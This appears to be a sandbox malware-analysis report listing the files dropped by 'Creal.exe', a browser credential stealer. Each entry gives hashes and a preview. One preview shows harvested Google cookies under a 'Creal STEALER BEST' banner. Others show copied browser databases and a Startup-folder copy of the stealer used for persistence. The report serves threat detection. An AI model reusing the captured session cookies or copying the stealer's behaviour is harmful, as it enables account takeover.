                                                                                                                                                                                                                                                      SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\RECORD

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4557
                                                                                                                                                                                                                                                      Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                                      MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                                      SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                                      SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                                      SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\WHEEL

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                      Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                                      MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                                      SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                                      SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                                      SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\entry_points.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):104
                                                                                                                                                                                                                                                      Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                                      MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                                      SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                                      SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                                      SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\sqlite3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1540368
                                                                                                                                                                                                                                                      Entropy (8bit):6.577233901213655
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:cmKZpHTv4iPI9FDgJNRs++l8GwLXSz4ih5Z5jWbsxuIl40OwumzuLxIhiE:0rJoDgJNRs+U8GwLXSMIZ5jWb0uIl48R
                                                                                                                                                                                                                                                      MD5:7E632F3263D5049B14F5EDC9E7B8D356
                                                                                                                                                                                                                                                      SHA1:92C5B5F96F1CBA82D73A8F013CBAF125CD0898B8
                                                                                                                                                                                                                                                      SHA-256:66771FBD64E2D3B8514DD0CD319A04CA86CE2926A70F7482DDEC64049E21BE38
                                                                                                                                                                                                                                                      SHA-512:CA1CC67D3EB63BCA3CE59EF34BECCE48042D7F93B807FFCD4155E4C4997DC8B39919AE52AB4E5897AE4DBCB47592C4086FAC690092CAA7AA8D3061FBA7FE04A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).0...(.......................................................P....`..............................................#...........`...............R.../...p..X...0...T..............................@............@..X............................text...9........0.................. ..`.rdata..,....@.......4..............@..@.data...`M...0...D..................@....pdata...............\..............@..@.rsrc........`.......8..............@..@.reloc..X....p.......B..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\unicodedata.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):709904
                                                                                                                                                                                                                                                      Entropy (8bit):5.861739047785334
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
                                                                                                                                                                                                                                                      MD5:0902D299A2A487A7B0C2D75862B13640
                                                                                                                                                                                                                                                      SHA1:04BCBD5A11861A03A0D323A8050A677C3A88BE13
                                                                                                                                                                                                                                                      SHA-256:2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
                                                                                                                                                                                                                                                      SHA-512:8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edusmtpg.41k.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdhfbhsk.m2d.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhsnf5ar.thn.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iggbdv3s.2dr.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcznofi3.g1i.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3vwmmqj.aw4.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_um4u1suh.lx5.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfasjigf.dr4.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\crcook.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):304
                                                                                                                                                                                                                                                      Entropy (8bit):5.90790645354655
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:FO1g2D1Qv3rocHDKJlSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISh+3rocHDyzxbW:CgC1Qv79mlDuyXv3RdJqmOvO65+79EM
                                                                                                                                                                                                                                                      MD5:16B117D739C5C713216C888646504566
                                                                                                                                                                                                                                                      SHA1:63577F666F43DC5960560C35D6E9978F612BE2C3
                                                                                                                                                                                                                                                      SHA-256:F1F819FA429E383A289E8226E1E25BEF457589FF61E84817371ED9D9658FA5DF
                                                                                                                                                                                                                                                      SHA-512:83C89FD6D78201D49EFBEBC0B6F0E3646C2246D0E082DB909C88252E3AA4FCC7304016514DB80D4B50339295689698D45C24F83E71F1D166CB62F4C399EBE37D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<--Creal STEALER BEST -->.....google.com.TRUE./.FALSE.2597573456.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-06..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcrczxitjin.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcrnfplvcwt.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcrqdifbbwb.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                                      MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                                      SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                                      SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                                      SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcrsllrvszk.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcrwnxfrusw.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                      Encrypted:false
